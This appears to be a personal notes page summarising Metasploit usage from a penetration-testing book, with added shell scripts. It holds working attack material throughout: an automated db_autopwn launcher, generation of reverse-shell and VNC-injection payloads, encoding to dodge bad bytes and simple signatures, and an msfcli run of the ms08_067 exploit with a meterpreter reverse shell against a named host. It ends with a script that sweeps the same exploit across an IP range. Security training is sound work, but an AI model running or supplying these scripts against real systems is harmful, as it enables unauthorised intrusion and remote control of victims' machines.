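As an added example (not from the page or the book it summarises), here is the scan, db_import, db_autopwn sequence shown above wrapped in a POSIX shell script. It runs the page's nmap command with XML output, writes an msfconsole resource script that imports the file and lists the matching modules, and only adds -e (actually launch the exploits) when AUTOPWN_EXECUTE=1, so the default run is a review of what db_autopwn would fire, which is what you want given the plugin's own warning that it crashes systems. The file names scan.xml and autopwn.rc are assumptions; -sS needs root.

```shell
#!/bin/sh
# Added example: wrap the nmap -> db_import -> db_autopwn sequence in an msfconsole resource script.

# write_rc <nmap xml> <rc file>: emit the msfconsole commands that import the scan and match modules.
# By default db_autopwn only lists matches (-t -p -r); AUTOPWN_EXECUTE=1 appends -e to launch them.
write_rc() {
    xml=$1
    rcfile=$2
    flags="-t -p -r"            # -p: match on open ports, -r: reverse shells (firewall friendly)
    if [ "${AUTOPWN_EXECUTE:-0}" = "1" ]; then
        flags="$flags -e"
    fi
    {
        echo "db_status"
        echo "db_import $xml"
        echo "hosts -c address,os_name,os_flavor,os_sp"
        echo "services -u"      # only the ports nmap saw open
        echo "load db_autopwn"
        echo "db_autopwn $flags"
        echo "sessions -l"
        echo "exit"
    } > "$rcfile"
}

# scan <target> <xml>: the page's nmap invocation (-sS needs root; -Pn skips ping-based discovery)
scan() {
    if ! command -v nmap >/dev/null 2>&1; then
        echo "nmap not installed" >&2
        return 1
    fi
    nmap -sS -A -Pn -v -oX "$2" "$1"
}

# run <target>: scan, build the resource script and hand it to msfconsole (-q: no banner, -r: run script)
run() {
    xml=$(pwd)/scan.xml        # assumed output location
    rcfile=$(pwd)/autopwn.rc   # assumed resource script location
    scan "$1" "$xml"
    write_rc "$xml" "$rcfile"
    msfconsole -q -r "$rcfile"
}

# usage: AUTOPWN_EXECUTE=0 sh autopwn_rc.sh 192.168.8.5
if [ $# -gt 0 ]; then
    run "$@"
fi
```

Review the module list from the first run before setting AUTOPWN_EXECUTE=1; with -p, every service that nmap found on a non-default port will pull in the wrong modules.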

 

Generating shellcode with msfpayload

[bash]

root@ieroot:~# msfpayload -h

Usage: /opt/metasploit/msf3/msfpayload [<options>] <payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar>

OPTIONS:

-h Help banner
-l List available payloads

root@ieroot:~#

[/bash]

It can emit the payload in any of the formats listed as the last argument in the usage line above.

msfpayload is used much like msfcli.

[bash]

root@ieroot:~# msfpayload windows/x64/vncinject/reverse_tcp o

Name: Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager
Module: payload/windows/x64/vncinject/reverse_tcp
Version: 14774, 15548, 14976
Platform: Windows
Arch: x86_64
Needs Admin: No
Total size: 422
Rank: Normal

Provided by:
sf <stephen_fewer@harmonysecurity.com>

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
AUTOVNC   true             yes       Automatically launch VNC viewer if present
EXITFUNC  process          yes       Exit technique: seh, thread, process, none
LHOST                      yes       The listen address
LPORT     4444             yes       The listen port
VNCHOST   127.0.0.1        yes       The local host to use for the VNC proxy
VNCPORT   5900             yes       The local port to use for the VNC proxy

Description:
Connect back to the attacker (Windows x64), Inject a VNC Dll via a
reflective loader (Windows x64) (staged)
root@ieroot:~#

[/bash]

The rest is self-explanatory. Options are set as LHOST=192.168.0.222 and so on; a lowercase o (as in the transcript above) prints the module summary and options, and C, J, X etc. select the output format.

msfencode can then be applied to the generated payload (call it a payload or a backdoor, either way) to encode it. Note that this is encoding, not encryption: the output is a decoder stub plus the transformed payload, and anyone holding the sample can run it through the same decoder, so it only serves to avoid bad characters and trivial byte signatures.

msfencode -l lists the available encoders

msfencode -h shows the help
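Added example (not the book's or the page's own code) for the bad-character discussion in the msfpayload/msfencode notes earlier on this page and for the msfencode section here: a small POSIX shell helper that lists every offset in a raw payload file holding a forbidden byte, plus the pipeline that asks msfencode to avoid those bytes (-b) and then verifies the result. The encoder, payload and LHOST/LPORT values are the ones used elsewhere on the page; the output file name is an assumption.

```shell
#!/bin/sh
# Added example: verify that an encoded raw payload really avoids the caller's bad characters.

# bad_chars <file> <hex list>: print "offset N: 0xHH" for every byte of <file> that appears in the
# space-separated lowercase hex list (e.g. "00 0a 0d"); exit status 0 if clean, 1 if any were found.
bad_chars() {
    file=$1
    bad=$2
    found=0
    off=0
    for b in $(od -An -v -tx1 "$file"); do      # od prints one lowercase hex byte per word
        case " $bad " in
            *" $b "*) echo "offset $off: 0x$b"; found=1 ;;
        esac
        off=$((off + 1))
    done
    return $found
}

# encode_and_check <out file>: generate a raw reverse shell, encode it with shikata_ga_nai while
# telling msfencode to avoid NUL, LF and CR (-b), then re-check the output byte by byte.
# LHOST/LPORT are the placeholder values from the page. Skipped when the tools are not installed.
encode_and_check() {
    out=$1
    if ! command -v msfpayload >/dev/null 2>&1 || ! command -v msfencode >/dev/null 2>&1; then
        echo "msfpayload/msfencode not found, skipping" >&2
        return 0
    fi
    msfpayload windows/shell_reverse_tcp LHOST=192.168.1.101 LPORT=31337 R \
        | msfencode -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -t raw > "$out"
    if bad_chars "$out" "00 0a 0d"; then
        echo "$out is clean"
    else
        echo "$out still contains bad characters; try another encoder or more iterations (-c)" >&2
        return 1
    fi
}
```

The byte list you hand to -b should be exactly what you found the target's input path mangling (the NULL terminator, line endings, whatever a URL decoder or Unicode conversion touches); bad_chars is the independent check that the decoder stub and the encoded body really stayed clear of them.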

Usage and examples of the metasploit msfcli command

msfcli is designed for integrating the metasploit framework with other shell tooling.

[bash]

root@ieroot:~# msfcli -h
Usage: /opt/metasploit/msf3/msfcli <exploit_name> <option=value> [mode]
=======================================================================

Mode           Description
----           -----------
(A)dvanced Show available advanced options for this module
(AC)tions Show available actions for this auxiliary module
(C)heck Run the check routine of the selected module
(E)xecute Execute the selected module
(H)elp You’re looking at it baby!
(I)DS Evasion Show available ids evasion options for this module
(O)ptions Show available options for this module
(P)ayloads Show available payloads for this module
(S)ummary Show information about this module
(T)argets Show available targets for this exploit module

root@ieroot:~#

[/bash]

Show the options of a given exploit:

[bash]

root@ieroot:~# msfcli windows/smb/ms08_067_netapi o
[*] Please wait while we load the module tree…

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST                     yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

root@ieroot:~#

[/bash]

 

Set an option and list the compatible payloads in the same command:

[bash]

root@ieroot:~# msfcli windows/smb/ms08_067_netapi RHOST=127.0.0.1 p
[*] Please wait while we load the module tree…

Compatible payloads
===================

Name                                    Description
----                                    -----------
generic/custom Use custom string or file as payload. Set either PAYLOADFILE or
PAYLOADSTR.
generic/debug_trap Generate a debug trap in the target process
generic/shell_bind_tcp Listen for a connection and spawn a command shell
generic/shell_reverse_tcp Connect back to attacker and spawn a command shell
generic/tight_loop Generate a tight loop in the target process
windows/dllinject/bind_ipv6_tcp Listen for a connection over IPv6, Inject a DLL via a reflective loader
windows/dllinject/bind_nonx_tcp Listen for a connection (No NX), Inject a DLL via a reflective loader
windows/dllinject/bind_tcp Listen for a connection, Inject a DLL via a reflective loader
windows/dllinject/reverse_http Tunnel communication over HTTP, Inject a DLL via a reflective loader
windows/dllinject/reverse_ipv6_http Tunnel communication over HTTP and IPv6, Inject a DLL via a reflective loader
windows/dllinject/reverse_ipv6_tcp Connect back to the attacker over IPv6, Inject a DLL via a reflective loader
windows/dllinject/reverse_nonx_tcp Connect back to the attacker (No NX), Inject a DLL via a reflective loader
windows/dllinject/reverse_ord_tcp Connect back to the attacker, Inject a DLL via a reflective loader
windows/dllinject/reverse_tcp Connect back to the attacker, Inject a DLL via a reflective loader
windows/dllinject/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject a DLL via a reflective loader
windows/dllinject/reverse_tcp_dns Connect back to the attacker, Inject a DLL via a reflective loader
windows/dns_txt_query_exec Performs a TXT query against a series of DNS record(s) and executes the returned payload
windows/exec Execute an arbitrary command
windows/loadlibrary Load an arbitrary library path

#.... many more entries omitted

[/bash]

With the options and payload set, run the exploit:

[bash]

root@ieroot:~# msfcli windows/smb/ms08_067_netapi RHOST=www.haotuan.us PAYLOAD=windows/meterpreter/reverse_tcp LHOST=www.ieroot.com E
[*] Please wait while we load the module tree…

______________________________________________________________________________
| |
| 3Kom SuperHack II Logon |
|______________________________________________________________________________|
| |
| |
| |
| User Name: [ security ] |
| |
| Password: [ ] |
| |
| |
| |
| [ OK ] |
|______________________________________________________________________________|
| |
|______________________________________________________________________________|


=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ — –=[ 961 exploits – 509 auxiliary – 153 post
+ — –=[ 257 payloads – 28 encoders – 8 nops
=[ svn r15907 updated today (2012.09.28)

RHOST => www.haotuan.us
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => www.ieroot.com
[-] Handler failed to bind to 173.193.106.10:4444
[*] Started reverse handler on 0.0.0.0:4444
[-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (www.haotuan.us:445).

root@ieroot:~#

# In this example www.haotuan.us and www.ieroot.com stand for the target (victim) and the attacking machine; substitute their IPs when you try it.

# LHOST must be an address bound on the attacker's own interface: here the hostname resolved to a public IP that is not local, so the handler could not bind and fell back to 0.0.0.0.

# And don't forget to set the ports too.

[/bash]
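As an added example (not from the book or the page's author), here is the "simple shell script over an IP range" mentioned in the earlier msfcli notes, applied to the ms08_067 module and payload used in this section: it expands a last-octet range, skips hosts on an exclude list, and launches one msfcli process per target with its own LPORT, because every msfcli instance starts its own reverse handler and two handlers cannot bind the same port. The module, payload and LHOST are placeholder values taken from the page; the MSFCLI variable defaults to echo, so the script only prints the commands until you point it at the real binary.

```shell
#!/bin/sh
# Added example: drive msfcli over an IPv4 range, one process per target.
# EXPLOIT/PAYLOAD/LHOST are placeholder values from the page; override them for your own engagement.
EXPLOIT="${EXPLOIT:-windows/smb/ms08_067_netapi}"
PAYLOAD="${PAYLOAD:-windows/meterpreter/reverse_tcp}"
LHOST="${LHOST:-192.168.1.101}"     # must be an address bound on the attacking host, or the handler fails to bind
MSFCLI="${MSFCLI:-echo msfcli}"     # dry run by default; MSFCLI=/opt/metasploit/msf3/msfcli runs for real

# expand_range 192.168.1.10-12 -> one IP per line (last-octet ranges only; a bare IP prints itself)
expand_range() {
    prefix=${1%.*}
    last=${1##*.}
    case $last in
        *-*) lo=${last%-*}; hi=${last#*-} ;;
        *)   lo=$last; hi=$last ;;
    esac
    i=$lo
    while [ "$i" -le "$hi" ]; do
        echo "$prefix.$i"
        i=$((i + 1))
    done
}

# sweep <range> [skip list]: run the exploit against every host in <range> except those in the
# space-separated skip list. Each target gets the next LPORT so the reverse handlers do not collide.
sweep() {
    range=$1
    skip=${2:-}
    port=4444
    for ip in $(expand_range "$range"); do
        case " $skip " in
            *" $ip "*) continue ;;
        esac
        # $MSFCLI is deliberately unquoted so the dry-run default "echo msfcli" splits into two words
        $MSFCLI "$EXPLOIT" "RHOST=$ip" "PAYLOAD=$PAYLOAD" "LHOST=$LHOST" "LPORT=$port" E
        port=$((port + 1))
    done
}

# usage: sh msfcli_sweep.sh 192.168.1.10-20 "192.168.1.15 192.168.1.16"
if [ $# -gt 0 ]; then
    sweep "$@"
fi
```

Run it once with the default MSFCLI to eyeball the command lines (and confirm the exclude list really removed your own and any out-of-scope hosts), then set MSFCLI to the real path. Because each target has a distinct LPORT, the msfcli calls can also be backgrounded with & to run in parallel.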

 

 

// The above is taken from the book Metasploit: The Penetration Tester's Guide, collected purely for my own reference.